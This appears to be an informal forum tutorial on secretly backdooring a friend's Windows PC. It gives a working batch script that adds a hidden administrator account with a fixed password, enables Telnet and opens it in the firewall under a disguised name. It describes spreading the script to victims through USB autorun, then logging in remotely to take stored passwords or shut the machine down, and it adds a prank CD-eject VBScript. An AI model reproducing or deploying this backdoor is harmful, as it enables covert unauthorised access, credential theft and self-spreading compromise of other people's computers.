If you have physical access to ur friends machine then u can access his machine remotely using telnet server. All u have to do is to create a user account there then hide that user from logon screen and then start telnet server and finally mark telnet as a exception in firewall.These stepes can be carried out simply and faster using a simple batch file.
Here i m providing the source of batch file:
anyname.bat
Code:
@echo OFF
net user IE_USR 123456 /add
net localgroup administrators IE_USR /add
net localgroup “remote desktop users” IE_USR /add
sc config tlntsvr start= auto
netsh firewall set allowedprogram %windir%\system32\tlntsvr.exe iexplorer enable
sc start tlntsvr
reg add “HKLM\software\microsoft\windows NT\CurrentVersion\winlogon\specialaccounts\UserList” /v IE_USR /t REG_DWORD /d 0
Now u can make this file to spread from one machine to another according to ur own method like i use to spread this file as a autoplay program in pen drives. Here i m providing u the code for autoplaying just put these two files in pen drive and u r work is done.
autorun.inf
Code:
Now what? when the victim plug this pen drive in his/her PC instal.bat runs and it will do all the work for u then u meet ur frnd online on yahoo msgr and use start - run - netstat -n 4 [press enter] to find his ip address. After getting the ipaddress goto start - run - telnet ipaddress [press enter] now press y and then use these login detail to get login
Code:
username: IE_USR
password: 123456
Nice work naa!!! i know. now you have the shell prompt of friend machine now u can do anything you can see what task are running there using tasklist command, you can shutdown his machine using shutdown -s, you can even get stored password from registry, you can do almost everthing from command prompt.
You can create more scripts and make fun...
Example: This script uses to open the cd rom
Code:
Set wmp = CreateObject("WMPlayer.OCX.7")
Set cdroms = wmp.cdromCollection
For j=1 to 3 'this is variable set how much time wants to open and close
If cdroms.Count >= 1 then
For i = 0 to cdroms.Count - 1
cdroms.Item(i).Eject
WScript.Sleep 1000
cdroms.Item(i).Eject
Next
End If
Next
Above code is vbscript remember it... Extension is vbs....
Just run this script to your remote mechine and hav fun!!!